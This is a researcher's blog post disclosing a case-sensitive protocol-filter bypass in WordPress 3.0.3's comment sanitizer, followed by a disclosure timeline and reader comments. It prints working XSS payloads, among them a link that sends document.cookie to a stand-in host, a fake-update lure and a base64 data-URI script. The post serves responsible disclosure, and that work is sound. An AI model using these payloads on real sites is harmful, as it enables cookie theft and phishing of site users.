Hello guys! :)
A new version of Wordpress has been released few hours ago, as you can see from here. It fixes a critical vulnerability, so that the wordpress twitter profile called it "the most important security release of the year" (tweet).
[+] Plaintext advisory
I want to show you some details about this vulnerabilty (I discovered), actually it could be really dangerous to not update your wordpress blog. Other contributions come from Jon Cave (duck_), he is a Wordpress core contributor.
Analysis
I report some extract of the mail I sent to the Wordpress security team.
The default install of Wordpress 3.0.3 allows to insert comments like the following in order to publish a link to other sites:
<a href="http://site.it">click me</a>
The protocol check is done when the href attribute is written in lower case, so an attacker
should insert any kind of protocol into the attribute href with a vector like the following:
<a HREF="javascript:alert(0)">click me</a>
This is a very bad way to sanitize HTML! We can bypass the protocol filtering process by exploiting a case sensitive matching. It is also possible to steal cookies of a logged user in a trivial way:
<a HREF="javascript:open('http://example.com/?cookie=' + document.cookie)">jjj</a>
I can also realize a more effective attack, as inserting something like this:
<a HREF="javascript:eval(document.getElementById('site-title').innerHTML+=' IMPORTANT WORDPRESS UPDATE, go to badsite.com to download it!');">nice site</a>
An inexperienced admin could click on the link and see a fake update alert on its private section. That is very very bad! Take a look at the screenshot to have an idea..
Wordpress needs an acceptation for each comment, but a "stupid" administrator could
allow a kind of fake comment, which looks fine, or he could simply click on the injected link.
So why am I not using a simple obfuscation method?! Actually the base64 encoding is perfect in this case:
<a HREF="data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==">click here</a>
The issue was in the kses.php, that is the HTML sanitation library. The protocol check should be done in any case. Lower case or upper case, do not matter. You can find all further information about the fix here. As you can see the strtolower($attrname) function has been used to overcome the issue.
Disclosure timeline
20101219 Vendor contact
20101220 Vendor proposes a patch
20101220 The patch is ok in my opinion
20101220 Vendor takes time to fully audit and test kses.php
20101229 Wordpress 3.0.4 release
I wish you a happy new year :)
Great and useful hints. Thanks a lot.
Complimenti e grazie da un grande utilizzatore di wordpress :)
Hello,
Does this vulnerability is for the news posts (in the admin panel) and the comments on a post too?
Kind regards
Hello nora, this vuln is for the comments filter!
there is another xss vulnerability also with this new wp version 3.0.4
look here http://pastebin.com/VSbnX3nk
Naah, that was a *false* issue!
Info at http://wpdevel.wordpress.com/2010/12/31/the-published-exploit-for-wordpress-3-0-4-isnt-accurate/
what a good job, you've done
Hi mate,
If I didn't click those links, it won't be a matter, right?
Because when I saw those spam comments, I usually delete it directly.. I really want to update to 3.04, but I don't think all those add-ons would be compatible
Hi Simon, if you don't click on those links, then you are not completely safe!
Infact the issue remains: a user, who visits your blog, can click on a malicious link, which is contained in a post comment!
So you have to be really careful while approving a comment!
> I don't think all those add-ons would be compatible
Sorry, but I don't know that. Ask to the Wordpress team.
Great hint, thanks!
I'm using a lot of WP sites to promote my customers activities and I was not aware of this vulnerability.
That's all good news!
That's not where the issues end. http://pastebin.com/VSbnX3nk exposes another xss vulnerability in version 3.0.4
@Michelle http://wpdevel.wordpress.com/2010/12/31/the-published-exploit-for-wordpress-3-0-4-isnt-accurate/